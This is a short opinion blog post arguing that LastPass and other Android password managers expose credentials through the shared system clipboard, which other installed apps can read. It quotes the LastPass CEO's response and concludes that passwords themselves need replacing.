Your LastPass, Stolen

LastPass is a popular mobile application that allows users to set and store login credentials for websites. LastPass is convenient for those who cannot remember their credentials or do not wish to type them in each time they visit a website. LastPass is not the only password manager application in the Play store, though it is currently the most popular. As convenient as LastPass may appear at first glance, a recent security study shows that LastPass may actually do more harm than good, causing a user’s credentials to be compromised.

All of the password managers currently in the Play store, including LastPass, utilize Android’s clipboard functionality to transfer login credentials from the password manager to a website’s authentication fields. For example, if a user has configured LastPass to store the credentials (typically a username and password) for a website, and the user navigates to that same website and is prompted to login, LastPass will automatically populate the user’s credentials by use of Android’s clipboard. Specifically, LastPass copies the stored credentials from the application and pastes them onto the website, therefore utilizing the clipboard.

This poses a serious security risk for users because other applications installed on the system may also have the ability to access Android’s system clipboard. This makes it possible for other applications to easily access the data copied by LastPass and even send this data to a remote server. LastPass CEO Joe Siegrist has responded to the controversy stating, “This vulnerability is at the Android operating system level” and “100% of password managers have allowed you to insert your password into other applications since Android’s existed.”

It is unfortunate that such seemingly convenient applications can become so potentially dangerous. I believe that risking an account compromise outweighs the benefits that these applications provide. Password managers are inherently dangerous since passwords can be accessed in plain text by either a local user or programmatically through the use of the system clipboard. In my opinion, it is clear that the use of password managers is an accident waiting to happen. Instead of trying to fix this issue, developers should concentrate on the more important task of finding a successor to the password as an authentication system.